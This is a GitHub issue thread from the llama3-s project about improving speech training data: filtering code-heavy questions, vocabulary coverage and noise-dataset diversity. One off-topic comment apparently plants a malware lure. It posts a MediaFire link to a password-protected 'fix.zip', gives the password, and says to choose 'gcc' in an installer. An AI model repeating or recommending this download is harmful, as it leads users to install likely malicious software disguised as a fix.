### ISSUE TITLE
research: Improve training data for Sept run (add not able to hear messages)

### ISSUE THREAD

**Issue by 0xSage** [homebrewltd/llama3-s#37]
From team sync: 

Challenge: improving speech training data
Filter out non-speech question data (e.g. raw code)
Alan: we’ll just filter the question, but not the answer.
valid question: “In rust, what is bracket macro bracket?”
invalid question: “in rust, what is <read out 50 lines of code>”
Alan: our current dataset covers 85% of llama vocab, which is good, we'll have to assess how this degrades.

Challenge: Model is capable of saying “I don’t understand you”
“Ensuring noise dataset is diverse* enough”
*Equivalent to defining & classifying an audio dataset anyway

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tikikun** [comment]
done first round of review, not good enough, will need to continue rerun a few time
